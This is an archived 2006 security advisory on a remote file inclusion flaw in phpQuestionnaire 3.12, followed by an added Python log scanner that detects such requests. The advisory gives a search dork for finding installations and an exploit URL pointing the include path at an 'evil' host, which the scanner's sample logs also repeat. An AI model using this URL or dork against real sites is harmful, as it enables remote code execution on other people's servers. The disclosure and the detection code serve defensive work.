phpQuestionnaire3.12.txt

2006-10-02T00:00:00
ID PACKETSTORM:50344
Type packetstorm
Reporter Solpot
Modified 2006-10-02T00:00:00

Description

                                        
`#############################SolpotCrew Community################################  
#  
# phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion   
#  
# vendor : http://www.chumpsoft.com/products/phpq/  
#  
#################################################################################  
#  
#  
# Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)  
#  
# contact: chris_hasibuan@yahoo.com   
#   
# Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt  
#  
################################################################################  
#  
#  
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid  
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa  
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo  
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX  
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^   
# and all member solpotcrew community   
# especially thx to str0ke @ milw0rm.com  
#  
###############################################################################  
Input passed to the "GLOBALS[phpQRootDir]" parameter is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  
  
Code from inc/ifunctions.php:  
  
################################################################################  
# phpQuestionnaire Version 3.12 #  
# Copyright 2003-2006 chumpsoft, inc. August 7, 2006 #  
# http://www.chumpsoft.com/products/phpq/ support@chumpsoft.com #  
################################################################################  
# Use of this program constitutes your agreement to the terms contained in the #  
# LICENSE file within this distribution. #  
################################################################################  
  
include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");  
  
function ImportSurvey ($fp, $type, $flag) {  
set_time_limit(600); # Attempt to disable time limit in case upgrade takes long  
  
  
google dork : "phpQuestionnaire v3"  
  
exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil  
  
##############################MY LOVE JUST FOR U RIE#########################   
######################################E.O.F##################################   
`
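
A defender-side check for the request pattern described above, as an added example that is not part of the original advisory or of phpQuestionnaire: it scans web access logs for requests that try to set a GLOBALS[...] variable through the query string, including percent-encoded variants. The log format, client addresses and paths in the sample are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (addresses and paths are made up).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Oct/2006:10:00:01 +0000] "GET /phpq/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil HTTP/1.1" 200 512
192.0.2.11 - - [02/Oct/2006:10:00:05 +0000] "GET /phpq/inc/ifunctions.php?GLOBALS%5BphpQRootDir%5D=hTTp%3A%2F%2Fevil HTTP/1.1" 200 512
192.0.2.12 - - [02/Oct/2006:10:00:09 +0000] "GET /phpq/index.php?survey=12 HTTP/1.1" 200 2048
192.0.2.13 - - [02/Oct/2006:10:00:12 +0000] "GET /phpq/inc/ifunctions.php?GLOBALS%255BphpQRootDir%255D=/tmp/ HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
GLOBALS_KEY_RE = re.compile(r'^GLOBALS\[([^\]]+)\]$', re.IGNORECASE)
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def fully_unquote(text, max_rounds=5):
    """Percent-decode repeatedly so layered encodings (%255B -> %5B -> [) are flagged too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_globals_overwrite(log_text):
    """Return (client, path, variable, kind) for every request that sets GLOBALS[...]."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        path, _, query = target.partition("?")
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            key_m = GLOBALS_KEY_RE.match(fully_unquote(key))
            if not key_m:
                continue
            # A scheme:// value means an external resource; anything else is a local path or probe.
            kind = "remote" if REMOTE_RE.match(fully_unquote(value)) else "local-or-other"
            hits.append((client, path, key_m.group(1), kind))
    return hits


if __name__ == "__main__":
    for hit in find_globals_overwrite(SAMPLE_LOG):
        print(hit)
```

This only sees query strings; a parameter sent in a POST body or cookie does not appear in a standard access log and needs request-body inspection at the web server or WAF.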